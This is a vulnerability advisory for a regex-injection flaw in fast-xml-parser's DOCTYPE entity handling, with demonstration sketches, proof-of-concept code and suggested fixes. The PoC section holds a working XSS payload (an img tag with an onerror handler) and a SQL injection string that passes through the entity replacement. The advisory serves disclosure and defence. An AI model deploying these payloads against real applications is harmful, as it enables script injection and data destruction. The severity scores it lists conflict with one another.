CVE-2026-25896
ADVISORY - GitHub
Entity encoding bypass via regex injection in DOCTYPE entity names
Summary
A dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow the built-in XML entities (&lt;, &gt;, &amp;, &quot;, &apos;) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered.
Details
The fix for CVE-2023-34104 addressed some regex metacharacters in entity names but missed . (period), which is valid in XML names per the W3C spec.
In DocTypeReader.js, entity names are passed directly to RegExp():
entities[entityName] = {
  regx: RegExp(`&${entityName};`, "g"),
  val: val
};
An entity named l. produces the regex /&l.;/g, where . matches any character, including the t in &lt;. Since DOCTYPE entities are replaced before built-in entities, this shadows &lt; entirely.
The same issue exists in OrderedObjParser.js:81 (addExternalEntities). In the v6 codebase, EntitiesParser.js has a validateEntityName function with a character blacklist, but . is not included:
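The wildcard behaviour can be checked in isolation, without the parser. The following is a minimal sketch that only reproduces the RegExp construction quoted above; the replacement value "X" is an arbitrary placeholder.

```javascript
// Entity name as it would appear in <!ENTITY l. "...">
const entityName = "l.";

// Same construction as in the advisory: the name is interpolated unescaped.
const regx = RegExp(`&${entityName};`, "g");

console.log(regx.source);                // &l.;
console.log("&lt;".replace(regx, "X"));  // X     (the dot matched "t")
console.log("&l.;".replace(regx, "X"));  // X     (the literal reference still matches)
console.log("&gt;".replace(regx, "X"));  // &gt;  (no match, first letter differs)
```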
// v6 EntitiesParser.js line 96
const specialChar = "!?\\/[]$%{}^&*()<>|+"; // no dot
Shadowing all 5 built-in entities
| Entity name | Regex created | Shadows |
|---|---|---|
| l. | /&l.;/g | &lt; |
| g. | /&g.;/g | &gt; |
| am. | /&am.;/g | &amp; |
| quo. | /&quo.;/g | &quot; |
| apo. | /&apo.;/g | &apos; |
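The five rows above can be verified with a small simulation of the two replacement passes. This is a sketch, not the library's code: replaceEntities and builtIns are hypothetical stand-ins, and the bracketed values are placeholders for attacker-chosen strings. It assumes only what the advisory states, namely that DOCTYPE entities are replaced before built-in ones.

```javascript
// Hypothetical stand-in for the parser's built-in entity table.
const builtIns = { lt: "<", gt: ">", amp: "&", quot: '"', apos: "'" };

// Hypothetical stand-in for the parser's two replacement passes.
function replaceEntities(text, doctypeEntities) {
  // Pass 1: DOCTYPE entities, built from unescaped names as in the advisory.
  for (const [name, val] of Object.entries(doctypeEntities)) {
    text = text.replace(RegExp(`&${name};`, "g"), val);
  }
  // Pass 2: built-in entities; nothing is left for them if pass 1 matched.
  for (const [name, val] of Object.entries(builtIns)) {
    text = text.replace(RegExp(`&${name};`, "g"), val);
  }
  return text;
}

const malicious = {
  "l.": "[LT]", "g.": "[GT]", "am.": "[AMP]", "quo.": "[QUOT]", "apo.": "[APOS]",
};

const input = "&lt; &gt; &amp; &quot; &apos;";
console.log(replaceEntities(input, {}));        // < > & " '
console.log(replaceEntities(input, malicious)); // [LT] [GT] [AMP] [QUOT] [APOS]
```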
PoC
const { XMLParser } = require("fast-xml-parser");
const xml = `<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY l. "<img src=x onerror=alert(1)>">
]>
<root>
<text>Hello &lt;b&gt;World&lt;/b&gt;</text>
</root>`;
const result = new XMLParser().parse(xml);
console.log(result.root.text);
// Hello <img src=x onerror=alert(1)>b>World<img src=x onerror=alert(1)>/b>
No special parser options are needed, since processEntities: true is the default.
When an app renders result.root.text in a page (e.g. innerHTML, template interpolation, SSR), the onerror handler of the injected <img> fires.
&amp; can be shadowed too:
const xml2 = `<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY am. "'; DROP TABLE users;--">
]>
<root>SELECT * FROM t WHERE name='O&amp;Brien'</root>`;
const r = new XMLParser().parse(xml2);
console.log(r.root);
// SELECT * FROM t WHERE name='O'; DROP TABLE users;--Brien'
Impact
This is a complete bypass of XML entity encoding. Any application that parses untrusted XML and uses the output in HTML, SQL, or other injection-sensitive contexts is affected.
- Default config, no special options
- Attacker can replace any of &lt; / &gt; / &amp; / &quot; / &apos; with arbitrary strings
- Direct XSS vector when parsed XML content is rendered in a page
- v5 and v6 both affected
Suggested fix
Escape regex metacharacters before constructing the replacement regex:
const escaped = entityName.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
entities[entityName] = {
  regx: RegExp(`&${escaped};`, "g"),
  val: val
};
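To see the effect of the escaping step, it can be wrapped in a small function and run against the same inputs as before. This is a sketch: buildEntityRegex is a hypothetical helper name, not a function in the library.

```javascript
// Hypothetical helper wrapping the suggested fix.
function buildEntityRegex(entityName) {
  // Prefix every regex metacharacter with a backslash so it matches literally.
  const escaped = entityName.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  return RegExp(`&${escaped};`, "g");
}

const fixed = buildEntityRegex("l.");

console.log(fixed.source);                // &l\.;
console.log("&lt;".replace(fixed, "X"));  // &lt;  (built-in entity no longer shadowed)
console.log("&l.;".replace(fixed, "X"));  // X     (the declared entity still resolves)
```

With the dot escaped, an entity named l. still works as declared, but it can no longer capture references to lt.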
For v6, add . to the blacklist in validateEntityName:
const specialChar = "!?\\/[].$%{}^&*()<>|+";
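A blacklist check of this kind might look like the sketch below. The function body is an assumption for illustration: the advisory names validateEntityName but does not show its implementation, and the character list here is the v6 blacklist quoted earlier with a dot added.

```javascript
// v6 blacklist as quoted in the advisory, with "." added (assumption).
const specialChar = "!?\\/[].$%{}^&*()<>|+";

// Hypothetical validator; the real validateEntityName may differ.
function validateEntityName(name) {
  for (const ch of specialChar) {
    if (name.includes(ch)) {
      throw new Error(`Invalid character "${ch}" in entity name "${name}"`);
    }
  }
  return name;
}

console.log(validateEntityName("copyright")); // copyright

try {
  validateEntityName("l.");
} catch (err) {
  console.log(err.message); // Invalid character "." in entity name "l."
}
```

Because a dot is valid in XML names, this approach also rejects legitimate entity names that contain one. Escaping the name, as in the v5 fix, avoids that trade-off.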
Severity
Entity decoding is a fundamental trust boundary in XML processing. This completely undermines it with no preconditions.
NIST
3.9
CVSS SCORE
9.3 critical
GitHub
3.9